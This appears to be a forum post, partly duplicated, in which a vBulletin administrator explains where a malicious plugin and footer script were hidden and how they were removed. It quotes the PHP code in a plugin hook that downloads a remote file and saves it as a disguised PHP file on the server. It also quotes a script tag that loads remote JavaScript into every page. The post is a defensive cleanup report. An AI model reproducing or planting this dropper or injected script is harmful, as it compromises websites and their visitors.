THIS POST IS TO SHOW WHERE I FOUND THE SCRIPT HIDING AND HOW I REMOVED IT
THIS IS NOT TO BE USED/ABUSED
Found this in the plugins
Product: vBulletin
Hook Location: ajax_complete
Title: !
Code:
Found this in the footer template
So delete that plugin (if you see it in the plugin manager)
and remove that line from the footer template (was at the top for me)
and make sure to update your vbulletin.
I then ran the site through http://sitecheck.sucuri.net/scanner/ to verify i removed it all.
THIS IS NOT TO BE USED/ABUSED
Found this in the plugins
Product: vBulletin
Hook Location: ajax_complete
Title: !
Code:
Code:
$linky="http://kokosina.in/sh.txt";$saved="./jquery.php"; $from=fopen("$linky","r"); $to=fopen("$saved","w"); while(!feof($from)){ $string=fgets($from,4096); fputs($to,$string); } fclose($to); echo 'done'; fclose($from);
Code:
<script type="text/javascript" src="http://kokosina.in/1"></script>
and remove that line from the footer template (was at the top for me)
and make sure to update your vbulletin.
I then ran the site through http://sitecheck.sucuri.net/scanner/ to verify i removed it all.
Comment